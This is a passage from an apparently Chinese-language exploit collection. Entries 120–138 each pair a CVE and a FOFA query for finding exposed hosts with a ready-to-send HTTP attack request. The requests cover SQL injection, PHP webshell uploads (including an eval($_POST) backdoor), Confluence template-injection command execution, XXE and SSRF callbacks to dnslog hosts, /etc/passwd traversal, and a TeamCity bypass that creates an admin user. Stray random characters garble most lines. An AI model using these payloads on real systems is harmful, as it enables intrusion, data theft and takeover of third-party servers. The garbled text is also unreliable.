- ^2 |: h/ p1 Q8 V0 {2 u mAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
9 C( F4 f7 h6 v1 E& F' R, k8 @# sAccept-Encoding: gzip, deflate* n D, V% X) e2 K
Content-Type: application/x-www-form-urlencoded;1 Y9 S" y! f5 p6 m5 f `; S
Content-Length: 109& O+ U O1 w( i; K& m( j v
Origin: https://58.18.133.60:8443
( D3 e6 ~2 ^( ] P: q9 i( uReferer: https://58.18.133.60:8443/sysmanage/manageadmin.php
, K- A3 |( {5 aSec-Fetch-Dest: empty! a- k: U3 P. f% a
Sec-Fetch-Mode: cors" w e' y! W" r# N
Sec-Fetch-Site: same-origin2 w. P/ M5 K/ m) }/ c I
X-Forwarded-For: 1.1.1.1
3 o. O7 F$ s( b0 ?; KX-Originating-Ip: 1.1.1.1
- U3 z J3 U3 p' ^. |0 a9 J/ ZX-Remote-Ip: 1.1.1.1
0 W" t. u" \0 e% i! a) O. BX-Remote-Addr: 1.1.1.1$ l3 h0 t N0 }; T( J% m8 x
Te: trailers
! Y* o) [* y: \) RConnection: close
) S! I8 F4 M- V) j, y
, B( D4 {0 ^/ g i, Nsrc=manageadmin&type=add&id=(select*from(select+if(length(database())=3,sleep(5),1))a)|1|1&value=test2|123456
5 ?) p1 }: J4 b3 @
0 F) X/ p; p" H: z9 J+ n, J$ {7 V% X
6 Z7 j2 \9 _. D0 a120. 北京百绰智能S40管理平台导入web.php任意文件上传
! E( y" U+ J- A" I: W0 k* ]3 L yCVE-2024-12532 `4 G# ]- Y% ], J& {7 r
FOFA:title="Smart管理平台"1 H& j% F! D2 \$ o# z/ G; k% h8 a
POST /useratte/web.php? HTTP/1.1
+ W8 d! h6 i7 j! L+ V, _Host: ip:port T# }( H ]8 W5 L& R, k
Cookie: PHPSESSID=cb5c0eb7b9fabee76431aaebfadae6db2 E( D6 C" @, y8 g9 A- ? t4 x5 q
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
S% g' G2 ?% ~9 N7 JAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8( ]6 q; V2 `3 ^- Z2 ~1 u
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
! p9 P# Y, o7 I2 u o9 uAccept-Encoding: gzip, deflate
: L6 ?5 M8 j# X& vContent-Type: multipart/form-data; boundary=---------------------------42328904123665875270630079328
* A. F" d) ]8 |; [2 Z& v6 `9 M. lContent-Length: 597# E& x5 }: D5 {& F5 ~( c
Origin: https://ip:port& O9 t% Z7 g3 B" A/ Z: V( P3 m
Referer: https://ip:port/sysmanage/licence.php! z+ H% B! }5 s" i0 x
Upgrade-Insecure-Requests: 1
) f$ q! B7 H$ i3 I( J' i/ u7 uSec-Fetch-Dest: document
9 }" M4 i) \+ {% o4 g9 L+ L1 iSec-Fetch-Mode: navigate# f' Y1 Q5 X$ J6 D( w- S4 x
Sec-Fetch-Site: same-origin2 ^/ `. _7 ]7 X7 Y+ _
Sec-Fetch-User: ?1% G1 X7 g7 y' Q7 d3 X4 _" [/ D
Te: trailers) Z9 ~$ _7 y' Y7 X. e
Connection: close H2 I8 Q0 c- [" ^) s9 }% [2 p
5 Z4 Y7 A3 B- x! h8 ?: q8 h
-----------------------------42328904123665875270630079328
- t' C* ^/ Y8 G( v/ B) Q/ G: K( ]Content-Disposition: form-data; name="file_upload"; filename="2.php"# R/ s. K: a1 F5 n* F: K
Content-Type: application/octet-stream6 Z7 N, z0 b) q9 {) W: K
( ` M5 W% U3 F# [<?php phpinfo()?>: o% ^ L1 l. B& x [8 @
-----------------------------423289041236658752706300793280 B8 }+ k/ _* E0 H3 P) R
Content-Disposition: form-data; name="id_type": \9 S0 E4 b) k0 `& b. E1 N( e/ B$ `
{% V, o! ]% f, X1
+ O% s( l0 N* D% E$ K2 u% q1 I: ]-----------------------------42328904123665875270630079328
9 E: Y% J9 ]: M; h4 s. \ m. s6 ]4 nContent-Disposition: form-data; name="1_ck", {5 X3 m2 h3 |8 b" f
5 U% t7 J! Z7 I( {, x* _0 M7 Q1 ~1_radhttp
' F: z" |% u4 y; A-----------------------------42328904123665875270630079328( {$ I, a* g; a' ]/ a/ d
Content-Disposition: form-data; name="mode"
; h' J9 D& ~5 g8 I' E' F
' z# B! x9 g3 X0 h7 x/ Zimport" @& i! c W3 y3 p- b; Z, o
-----------------------------42328904123665875270630079328
( x8 O& e1 o, \9 z/ e0 X$ B2 h- Q$ Z/ F6 Q6 ]# ^8 D
6 [# q) U; ?1 d- R文件路径/upload/2.php
% |% a" R7 S' p' @6 z0 s3 |: P
u! d& `; r2 Z& s, q121. 北京百绰智能S42管理平台userattestation.php任意文件上传$ P& b6 q8 r) D1 O7 ^6 T1 C( `3 r
CVE-2024-1918
u$ [" C4 i4 |4 v! O8 ^FOFA:title="Smart管理平台"6 t ?9 b$ I( u/ R# x
POST /useratte/userattestation.php HTTP/1.1
" Z& h/ Q' c) OHost: 192.168.40.130:8443# |5 ~6 V* K6 |' T. r( F1 w2 _, Y
Cookie: PHPSESSID=2174712c6aeda51c4fb6e6c5e6aaac50
. K; S) b, ~( j: R' A' g" a5 rUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko+ G* w* `' g5 L& P& v+ I! ~
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
, f" T8 o# f7 f( J0 Q# n, j' i4 wAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
c8 T; E' ^+ D7 n! O* q& [Accept-Encoding: gzip, deflate
* j o& E0 s8 {. j" ]' \# _/ vContent-Type: multipart/form-data; boundary=---------------------------42328904123665875270630079328& s! h. @6 E/ W2 l" S6 v
Content-Length: 592
* A2 p1 ^0 ~$ W1 sOrigin: https://192.168.40.130:8443 l- K+ l) a# n/ c3 R
Upgrade-Insecure-Requests: 1% S2 ~! J9 k, \+ i8 v
Sec-Fetch-Dest: document
$ d1 O, H/ \$ Q' FSec-Fetch-Mode: navigate
& H$ Z9 u. ]' R# B4 fSec-Fetch-Site: same-origin
7 @: l2 Z4 W% J8 r9 QSec-Fetch-User: ?15 Z1 s8 K+ j _: i
Te: trailers; \7 b0 W! b9 q& f2 W/ v/ _! s
Connection: close
( |5 i- w1 T, F8 s9 S4 _2 s! J+ i& E2 s
-----------------------------42328904123665875270630079328
+ G. o' Z( \9 u X) hContent-Disposition: form-data; name="web_img"; filename="1.php"
6 D- R- u. X) v: L. C9 v( SContent-Type: application/octet-stream
. D- t \2 p1 d0 R- A( k) P+ D$ w5 r0 D$ j8 D
<?php phpinfo();?>$ r; q$ d6 g4 N5 D) d3 p
-----------------------------42328904123665875270630079328
3 V, m$ B$ j! L, t9 D& M, ~Content-Disposition: form-data; name="id_type"
9 b) `4 J9 T: P4 U `. e# w* h7 v- o. S5 v' D' m: r8 H1 a7 N/ s0 h
1# ^7 R- B, h: Y# O& D
-----------------------------423289041236658752706300793281 S w# O6 R! b+ O8 }
Content-Disposition: form-data; name="1_ck"
! X; ^. ^! I' o. A6 f+ Y6 F6 I. o6 _* C7 I. h
1_radhttp
, k# ~7 r) X) ]* ?" {8 m. [, f-----------------------------42328904123665875270630079328
4 Q& z# w4 `( I( {$ @Content-Disposition: form-data; name="hidwel"& A* q% s m$ d+ M
$ B2 Z0 {* h: ~! Dset+ u- N( l& u: s) X8 c
-----------------------------42328904123665875270630079328; N, k5 d' ]# y. l
. J' A) M+ ~! F& L. L+ E0 R) s
B- @8 L( E Z- T$ v) g: Z4 Bboot/web/upload/weblogo/1.php
9 O/ A) F9 |& o4 f0 {( T( L! `$ ]
+ p& ~7 J# r* n7 X& h* R0 X122. 北京百绰智能s200管理平台/importexport.php sql注入3 Q0 k3 U& Q# ^/ N/ Y2 H
CVE-2024-27718FOFA:title="Smart管理平台"
; k3 d" ^# S. t0 [) L/ u( r" w其中sql=c2VsZWN0IDEsZGF0YWJhc2UoKSx2ZXJzaW9uKCk=是sql语句使用base64加密后的内容,原文:sql=select 1,database(),version()
, j: ^- C/ u( C: QGET /importexport.php?sql=c2VsZWN0IDEsZGF0YWJhc2UoKSx2ZXJzaW9uKCk=&type=exportexcelbysql HTTP/1.18 C* A2 y8 k# n$ Q/ f
Host: x.x.x.x
% O# Y# U# I% D. vCookie: PHPSESSID=f20e837c8024f47058ad2f689873dfc0
6 L7 R! k$ l7 u4 QUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
5 ~. D% K6 w- h, mAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8, ^" S4 ]% K. ]8 _
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2: X- y% l1 s6 p: e4 |. }/ ]
Accept-Encoding: gzip, deflate, br: _- g/ M0 h- v
Upgrade-Insecure-Requests: 1$ x7 R! a' j/ U) {
Sec-Fetch-Dest: document1 g9 V. G7 x2 l# G* V( W6 F
Sec-Fetch-Mode: navigate
, N1 k- e- m+ f# j9 j; d5 ZSec-Fetch-Site: none( Y! j3 t' M& h1 c5 ?0 G: q5 t
Sec-Fetch-User: ?1% Q7 `- C. h& }3 w) N
Te: trailers
. p; Z8 j- ]2 ?* aConnection: close
: h' m$ a! |6 t) P8 r% X/ r% R9 E* m0 ~8 A5 q) G/ e$ N6 s: N" ]( V/ e0 s
9 P V% G5 E+ Y4 d7 J# y2 Y123. Atlassian Confluence 模板注入代码执行( c6 R. ~! g$ S4 ^! V# F) Q
FOFA:app="ATLASSIAN-Confluence" && body="由 Atlassian 合流8.5.3"7 @( L5 e8 T$ j: }
POST /template/aui/text-inline.vm HTTP/1.1
S5 V) C% i& r6 K: O2 }: AHost: localhost:8090
9 j; R) \( L& n& w$ PAccept-Encoding: gzip, deflate, br
5 f1 D8 N$ {7 c. C8 _$ o6 bAccept: */*; O0 s0 i/ ?% F% N f
Accept-Language: en-US;q=0.9,en;q=0.86 F' y2 J3 \" k! E
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.6045.159 Safari/537.36( q$ d0 M% M. t
Connection: close
2 j# j: I1 s5 x! HContent-Type: application/x-www-form-urlencoded
* q% O, ]6 q: [$ j% Q
* ?9 Y9 R/ U r+ V9 Mlabel=\u0027%2b#request\u005b\u0027.KEY_velocity.struts2.context\u0027\u005d.internalGet(\u0027ognl\u0027).findValue(#parameters.x,{})%2b\u0027&x=@org.apache.struts2.ServletActionContext@getResponse().setHeader('X-Cmd-Response',(new freemarker.template.utility.Execute()).exec({"id"}))
! k: B7 r4 C3 C T: b' Q6 D! W: U0 l k4 Q5 c1 f( ~
6 y) e8 X6 P+ @2 S
124. 湖南建研工程质量检测系统任意文件上传
5 ]! |8 I7 J, X4 P( uFOFA:body="/Content/Theme/Standard/webSite/login.css"
0 S, F8 L) s$ p% n: Y# g% y6 XPOST /Scripts/admintool?type=updatefile HTTP/1.1
4 L' o9 w4 M% y5 J/ w: k: I K! N3 ~Host: 192.168.40.130:82822 m0 _: N `( r$ R7 `/ F) w
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36& U5 D6 j) _+ t2 v- r8 b/ R
Content-Length: 72, X8 ~7 b, b; ]5 ]- M8 X
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8; @7 |7 R3 h" p" ]# ` F
Accept-Encoding: gzip, deflate, br
8 k3 @ G7 z5 m9 P* t: D# ~2 UAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
/ K8 T$ Z3 Q3 \) ZConnection: close- q; R0 g/ L, x$ w0 t$ E5 y4 D/ `- \
Content-Type: application/x-www-form-urlencoded
4 e/ l6 Q. u/ F6 ~5 x
: h9 V+ F2 M6 r& a9 afilePath=abcgcg.aspx&fileContent=<%Response.Write("Hello,World")%>
" o1 e4 `1 K2 n! E0 ~
% v' t, {% u. e9 E: j' B0 c3 ?' k* t U T
http://192.168.40.130:8282/Scripts/abcgcg.aspx1 T4 e' q# _% d: a9 Y
# t$ M/ W9 V, k a& ]/ r2 k125. ConnectWise ScreenConnect身份验证绕过
4 Z) K1 B- \: }* e7 K. d. cCVE-2024-1709
- J8 k# g. Y7 ~7 LFOFA:icon_hash="-82958153"
0 o7 ^5 R- r* `; p* hhttps://github.com/watchtowrlabs ... bypass-add-user-poc \6 A9 K, Y% P! g$ s9 T
) y, v6 P7 H6 e2 m; x4 Q
1 ^2 Q* w: u$ ?
使用方法
* _) D. n; z" l: upython watchtowr-vs-ConnectWise_2024-02-21.py --url http://localhost --username hellothere --password admin123!& d8 G; _$ [4 X. g. `& Z( P3 |& l
, M" v, x; Y# }; x
+ T$ t* S8 e7 B5 s& S创建好用户后直接登录后台,可以执行系统命令。* y- w# Q, w; Z$ l4 V& t7 P
. m% c5 m8 V$ x; H126. Aiohttp 路径遍历
" c4 f/ K$ w/ v4 I* dFOFA:title=="ComfyUI", W4 h: [/ I8 D0 \; d
GET /static/../../../../../etc/passwd HTTP/1.1
1 C8 Q: K: n3 Q* f8 nHost: x.x.x.x
3 _2 [7 ?/ b4 ` C5 ?+ RUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
0 _; C0 m! @) C/ L% D7 iConnection: close: w8 g1 j! }) K4 R' Z% {
Accept: */*
4 d# i3 V8 q! @! C5 ^Accept-Language: en
5 Q/ A: u. E; p0 KAccept-Encoding: gzip; b5 b# H; b( R1 g6 {
. l/ U, V8 s9 e" F8 m! H' N
+ I1 I* ?* |6 |& G0 u5 y127. 广联达Linkworks DataExchange.ashx XXE
" F' _9 R0 o1 W; a* N/ uFOFA:body="Services/Identification/login.ashx" 4 ]- k# n8 N" n9 V2 R' ^
POST /GB/LK/Document/DataExchange/DataExchange.ashx HTTP/1.1
) q [9 V) Q- e+ m; pHost: 192.168.40.130:8888
' _4 B% A. E; i& I1 I7 AUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.5790.171 Safari/537.36
. e: r$ k) P2 A4 j8 [: a% h& IContent-Length: 415
6 M% z) C4 T1 b4 O3 T: r' u6 A5 vAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7' w7 p: [' u% l/ a9 p
Accept-Encoding: gzip, deflate
2 _6 j! c4 _# k" s) E3 @Accept-Language: zh-CN,zh;q=0.9# g* ]% {4 r: C7 g9 h
Connection: close: L# A* w9 W- }+ y0 ^% [, Y
Content-Type: multipart/form-data;boundary=----WebKitFormBoundaryJGgV5l5ta05yAIe0/ @+ l7 t: t* _ V2 O
Purpose: prefetch
1 y" f& r" c n) n4 [+ M9 DSec-Purpose: prefetch;prerender
( v3 A$ d" i, W6 z# B/ @: x8 {2 q0 Y" I8 C+ I0 H4 v
------WebKitFormBoundaryJGgV5l5ta05yAIe0
3 ~ C6 i0 d9 [% S, [# cContent-Disposition: form-data;name="SystemName"4 n9 p0 }1 t# P- G6 P
7 h5 U) H# M: J; E1 F% Q
BIM
3 \# c* @, n9 q8 I2 |------WebKitFormBoundaryJGgV5l5ta05yAIe0
: `( J6 p; Q( sContent-Disposition: form-data;name="Params"4 z t; K3 D. V
Content-Type: text/plain* Q8 M6 x" i; f) r7 D
. \* E# P) H% l* a
<?xml version="1.0" encoding="UTF-8"?>6 b' W6 W& u0 c* {. V* z
<!DOCTYPE test [
, c5 ]& k/ Z1 j: s) n. N; {+ E<!ENTITY t SYSTEM "http://c2vkbwbs.dnslog.pw">
& [1 p6 z1 }2 u, v c3 A3 M]
( V; ]# r" s6 O8 y>
1 V1 A3 ]8 g7 K2 k5 q0 e$ n" D3 G<test>&t;</test>
: c, M/ j& z" u$ } c7 _------WebKitFormBoundaryJGgV5l5ta05yAIe0--
2 J5 h/ Y( A+ Y: j4 p
4 ]( T o/ ?/ ]
$ C, k# b$ \; F2 \+ r1 o! F* g. C% o# s1 m x8 \
128. Adobe ColdFusion 反序列化+ J4 X) C1 U7 ~
CVE-2023-38203
2 ~4 g" ~' e" Y9 p0 UAdobe ColdFusion版本2018u17(以及早期版本)、2021u7(以及早期版本)和2023u1(以及早期版本)
/ }# \& z& E) j! WFOFA:app="Adobe-ColdFusion"* P" {6 f0 x) q" s4 V% v& S2 z
PAYLOAD
# H: `8 `/ k" X1 V5 U
# K: ^3 Y$ D5 {% N# D129. Adobe ColdFusion 任意文件读取8 o& g( F3 F+ `$ m
CVE-2024-20767- f+ ~7 h# i% T1 ^+ U# D, F4 A
FOFA:app="Adobe-ColdFusion" && title=="Error Occurred While Processing Request"% E3 S2 ~) f* k( M- {
第一步,获取uuid
/ R& f" J) l& |; r" ^* BGET /CFIDE/adminapi/_servermanager/servermanager.cfc?method=getHeartBeat HTTP/1.16 w; h! e% r; \- W
Host: x.x.x.x% E) \- N+ \' |3 P3 H
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36, c6 I5 P" @, S5 p9 T) q5 @
Accept: */*
5 o1 h3 z1 R2 r% K6 j% [/ N1 lAccept-Encoding: gzip, deflate1 r. H3 j3 |. l1 g$ Y
Connection: close* _ ?. D! E& F6 `, r5 T# }. l
& C! h I* t9 q# F# @. i
8 ]( @: @& D9 J+ N$ O0 y- r0 `第二步,读取/etc/passwd文件2 {! d4 }! J& B- x/ B; Z) u
GET /pms?module=logging&file_name=../../../../../../../etc/passwd&number_of_lines=100 HTTP/1.1
: ?& @2 R$ R* f% j- EHost: x.x.x.x4 d! ?# B- O, W) H5 g
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36; L7 S) J0 n- H
Accept: */*+ r# s7 B6 D( x
Accept-Encoding: gzip, deflate
! _6 a7 y) m+ S( `3 VConnection: close
8 _8 V9 q- {8 a4 M, D3 _uuid: 85f60018-a654-4410-a783-f81cbd5000b9; [2 s) r8 N0 `0 P) {4 L
9 ?- W$ ?3 z. K X) M! K' ?6 b9 s
4 T+ M, n- K& L$ H S/ e
130. Laykefu客服系统任意文件上传, {& I2 ^9 L; X, \( P; e( x; ~
FOFA:icon_hash="-334624619") t% a: C2 Y( T1 q1 L: x
POST /admin/users/upavatar.html HTTP/1.1
/ L& E3 V$ `0 BHost: 127.0.0.1
9 ~4 U6 P- o7 lAccept: application/json, text/javascript, */*; q=0.014 ^# d1 i9 E* k1 Y4 Q. p
X-Requested-With: XMLHttpRequest
% d5 p, Y1 c2 Y" @: vUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36 Edg/107.0.1418.263 d- P; B( T, D( p0 P8 t
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary3OCVBiwBVsNuB2kR) ]. e5 T- q9 g! ^
Accept-Encoding: gzip, deflate
R1 P) k# r# W! |Accept-Language: zh-CN,zh;q=0.9& r" Y) q% W c9 U, @! v$ g
Cookie: user_name=1; user_id=3" i8 v1 u- A' t9 T! U+ L/ y
Connection: close+ p' O( w, k& A# Q b% b
0 U- f/ x, Z7 m1 u+ H4 o1 v------WebKitFormBoundary3OCVBiwBVsNuB2kR& N& P* R* F; o g3 P. l
Content-Disposition: form-data; name="file"; filename="1.php"4 e) A# D; \4 ~7 N
Content-Type: image/png8 T! g# X0 m1 q8 _2 b
( Q: o! H& M. A- Q# V2 T- [
<?php phpinfo();@eval($_POST['sec']);?>
" @& |7 B6 o4 d: S! M! h------WebKitFormBoundary3OCVBiwBVsNuB2kR--
c1 U }6 R! W: a9 X' {+ z% y
! s- d* L1 a- P
. Y& B; B9 T3 h4 T/ X( m9 A. c131. Mini-Tmall <=20231017 SQL注入
4 _' m; z' t2 ?2 `FOFA:icon_hash="-2087517259"
$ Q! g" W @8 X" x) c8 `$ u! h后台地址:http://localhost:8080/tmall/admin6 u2 d7 T* `- Q: L: R+ X8 j2 O
http://localhost:8080/tmall/admin/user/1/1?orderBy=7,if((length(database())=11),SLEEP(3),0)
7 W' `, m+ | S
" K9 D @' x0 f: `+ }$ K132. JetBrains TeamCity 2023.11.3 及以下版本存在身份验证绕过
4 p+ y: s2 g1 l5 _: W3 W% } OCVE-2024-27198
+ b: {# u; B+ z6 C4 gFOFA:body="Log in to TeamCity"% N" T+ I- V) G8 H
POST /pwned?jsp=/app/rest/users;.jsp HTTP/1.1
1 e/ l7 ^8 A$ n6 FHost: 192.168.40.130:81114 ?# W: P5 @4 }8 T. F. y0 R) B
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.369 B) f6 S8 e [1 g( T8 ?- f; k
Accept: */*2 K6 y: r# y; E6 A5 g3 T! T1 S" S
Content-Type: application/json" h; B& v3 d" T
Accept-Encoding: gzip, deflate+ ]: v6 t) W( A" O: c5 F7 K
; d" |/ g6 A+ x( {+ `/ p& Y& E{"username": "用户名", "password": "密码", "email": "test@mydomain.com", "roles": {"role": [{"roleId": "SYSTEM_ADMIN", "scope": "g"}]}}
$ H1 N6 [# f. s2 ?- S! \
/ N8 A/ }& ^1 I& X: L/ P' x- A9 H! C% e. Y" S5 o z& J, g' ^- I9 B
CVE-2024-27199
5 x) q0 b( K) } n2 L% m+ S/res/../admin/diagnostic.jsp1 F" N) z- q0 H3 y% G0 r
/.well-known/acme-challenge/../../admin/diagnostic.jsp+ D( k5 o0 V( k m- `
/update/../admin/diagnostic.jsp+ g( ]1 T1 C5 D' d$ K& N
$ X( ?- M h/ {8 ^' j) k7 z
6 X0 w) L3 M+ {" l8 }CVE-2024-27198-RCE.py
$ h' Z& F$ T, ^6 X8 Y
( @; ^; M! {/ o v0 d. H" q% _" l% ~2 D133. H5 云商城 file.php 文件上传
: Y# R1 v+ X( J& ^0 V9 nFOFA:body="/public/qbsp.php"9 t' ~/ m0 v/ l9 \! i) B6 S% C
POST /admin/commodtiy/file.php?upload=1 HTTP/1.1 X' d) ~/ |) H1 i3 `3 }9 Q
Host: your-ip
8 L& D- l- j* c- L. }- W5 dUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36(KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
% x' i7 r a9 O) `8 |. qContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryFQqYtrIWb8iBxUCx/ t, a9 T& A, A" [" Z' m
( e4 l& E. c7 X) C/ v- ]$ b7 A
------WebKitFormBoundaryFQqYtrIWb8iBxUCx
5 v7 V" J8 c/ T( PContent-Disposition: form-data; name="file"; filename="rce.php"
( o0 R- w' r8 X8 g" A9 M% N& [0 IContent-Type: application/octet-stream
5 G6 s' b+ L9 U2 Q2 J) C
" L' }0 @# I J4 A7 p, e* y# Y<?php system("cat /etc/passwd");unlink(__FILE__);?>) |) u. S/ v, M3 p0 i7 s2 ^
------WebKitFormBoundaryFQqYtrIWb8iBxUCx--$ j7 F, m1 p% U9 {
! A2 t* C& S5 |1 x+ _, \0 U
1 N: [: v, ^( x
8 H& q3 k# c* G/ b134. 网康NS-ASG应用安全网关index.php sql注入* [6 f* S5 s: R, k8 R
CVE-2024-2330
8 _! Z/ S$ z: FNetentsec NS-ASG Application Security Gateway 6.3版本
# h6 i5 b+ L. F2 m( T/ CFOFA:app="网康科技-NS-ASG安全网关"3 M' `0 { z9 X I M' O5 M6 P
POST /protocol/index.php HTTP/1.1
6 v3 y6 C/ L, x7 \$ aHost: x.x.x.x! T v- e2 t% J0 G$ a% T, |
Cookie: PHPSESSID=bfd2e9f9df564de5860117a93ecd82de# C0 R4 U: K8 L( |/ d. A. |& i
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/110.0
& G4 V4 e" m6 C+ C4 S/ YAccept: */** ^% ^1 b' W, A
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2$ ]# K; p( N! [ w7 ?
Accept-Encoding: gzip, deflate' n: g6 F; P6 R- g# x& ~$ e6 B
Sec-Fetch-Dest: empty
: ~3 R. c q# vSec-Fetch-Mode: cors3 ?1 y/ E: p: W) n( J1 W
Sec-Fetch-Site: same-origin0 z& _' `2 l$ `, m9 w; J2 {( X
Te: trailers9 Y: B2 P2 \' v0 l* _
Connection: close
$ o1 Z0 m; P6 ~1 P9 NContent-Type: application/x-www-form-urlencoded$ a1 X2 i3 d2 z( X
Content-Length: 263
( a0 l( G" c& @2 q2 R* w5 S+ {8 v$ p- Z/ r
jsoncontent={"protocolType":"addmacbind","messagecontent":["{\"BandIPMacId\":\"1\",\"IPAddr\":\"eth0'and(updatexml(1,concat(0x7e,(select+version())),1))='\",\"MacAddr\":\"\",\"DestIP\":\"\",\"DestMask\":\"255.255.255.0\",\"Description\":\"Sample+Description\"}"]}+ J/ H! c z7 v, G) y: W/ d
* l% z) S* A2 q F4 n
' M7 {9 k0 [+ E( A: R135. 网康NS-ASG应用安全网关list_ipAddressPolicy.php sql注入( r# U0 f5 w4 p) v4 R7 [
CVE-2024-2022
- \8 M- J' t* h: x7 i O* a# XNetentsec NS-ASG Application Security Gateway 6.3版本7 d4 q! R3 R% G) ^
FOFA:app="网康科技-NS-ASG安全网关"
6 `8 s' T) F, M3 X% n; v& ZGET /admin/list_ipAddressPolicy.php?GroupId=-1+UNION+ALL+SELECT+EXTRACTVALUE(1,concat(0x7e,(select+md5(102103122)),0x7e)) HTTP/1.1
l+ v% S" G1 g% ^Host: x.x.x.x2 f, b& U/ r$ }3 X: j& F
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36- N' }) B2 w& {6 k; `1 Q
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
6 k5 q- E& `; F/ ?; Z: JAccept-Encoding: gzip, deflate
# W7 X& I" @/ A4 ~+ `% KAccept-Language: zh-CN,zh;q=0.9, L% y! f9 s" t* Y
Connection: close
q1 s1 a& X, N% ^% [: t2 R6 F$ H; K" p* W
2 M) P/ ~$ S+ o0 b9 T
136. NextChat cors SSRF
& g S7 ^, P* l" T! tCVE-2023-49785
C8 m' O, Z# g8 jFOFA:title="NextChat"# x+ P$ K. p W* W8 c
GET /api/cors/http:%2f%2fnextchat.kr9dqoau.dnslog.pw%23 HTTP/1.1* Y6 ~7 I" o8 l8 O
Host: x.x.x.x:10000
9 M) S, P! v' V7 tUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36( h! X! X+ p: d; s s2 W: r
Connection: close
/ o3 H6 q, q/ pAccept: */*
) u$ ^! f2 S& g, i) y. bAccept-Language: en
: G/ g, m4 L( L {9 uAccept-Encoding: gzip+ W0 I+ ]" }0 i* [* n8 j
( y' G1 x2 J5 c; f; r
2 R# W; Q" ^3 j6 r
137. 福建科立迅通信指挥调度平台down_file.php sql注入1 O. ~+ D- H3 D: o! F6 z W2 k, i; m
CVE-2024-2620
: i) E' p5 |8 e+ v j* m* r5 eFOFA:body="app/structure/departments.php" || app="指挥调度管理平台"
4 r& ], P: a# XGET /api/client/down_file.php?uuid=1%27%20AND%20(SELECT%205587%20FROM%20(SELECT(SLEEP(5)))pwaA)%20AND%20%27dDhF%27=%27dDhF HTTP/1.1
( V4 T" \- G! v( k! {3 IHost: x.x.x.x
5 U+ L ]+ }* `) R- K7 fUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0" Z3 E7 w1 z/ m7 g* x. I
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8" u* b8 Q8 K# U3 ]
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
" K$ W# y( d8 D7 [$ VAccept-Encoding: gzip, deflate, br- A3 N$ m* N& u# l( q
Connection: close4 m. ]9 A$ P$ V5 K9 Y
Cookie: PHPSESSID=d62411cd4ada228583bbcae45f099567; authcode=uksj5 }- q5 a$ y5 s% m1 R
Upgrade-Insecure-Requests: 11 g1 M5 N: v7 m, `% O' j* T: z+ a
8 ^. R v$ I1 }. F+ N
5 e$ M9 ^4 o- _
138. 福建科立讯通信指挥调度平台pwd_update.php sql注入) K$ c7 k8 G' B
CVE-2024-2621
3 Q& m2 q4 e; @$ T8 B o2 bFOFA:body="app/structure/departments.php" || app="指挥调度管理平台"% \. d, K8 E) N2 Q
